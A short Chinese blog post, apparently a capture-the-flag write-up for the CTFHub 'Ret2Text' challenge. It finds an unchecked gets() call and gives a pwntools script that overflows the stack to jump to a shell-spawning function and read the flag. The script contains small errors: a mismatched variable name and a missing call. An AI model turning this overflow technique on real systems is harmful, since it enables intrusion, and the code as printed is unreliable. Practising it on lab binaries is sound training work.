CTFHUB(PWN)Ret2Text

程序小小黑

 关注

阅读 95

2022-02-02

首先检查保护机制 checksec

64 位 + 什么保护都没开

然后放到ida64中查看

发现gets函数,没有限制数据的长度,容易发生栈溢出

shift+F12 找到bin_sh函数地址

64位程序直接读取偏移量

构造payload,编写exp

from pwn import*
p=remote("ip",端口)
binsh_addr=地址
payload='a'*(0x70+8)+p64(bin_sh)
p.sendline(payload)
p.interactive

连接成功后ls

cat flag

相关推荐

pwn ret2text

殇感故事 64 0 0

【PWN刷题__ret2text】[CISCN 2019华北]PWN1

灵魂跑者 52 0 0

pwn刷题num32----ret2text

诗远 41 0 0

【PWN · ret2libc】[CISCN 2019东北]PWN2

cnlinkchina 61 0 0

2022 starctf pwn ret2school

快乐小码农 88 0 0

pwn基本ROP——ret2syscall

三千筱夜 40 0 0

[pwn] 5.ROP-ret2libc

Java旺 70 0 0

[CTFHub]ret2text-入土为安的第十二天

勇敢的趙迦禾 23 0 0

CTF-PWN-buuctf-ciscn_2019_c_1-ret2libc的典型使用

菜头粿子园 83 0 0

BUUCTF Pwn pwn2_sctf_2016

探头的新芽 62 0 0

精彩评论(0)

0 0 举报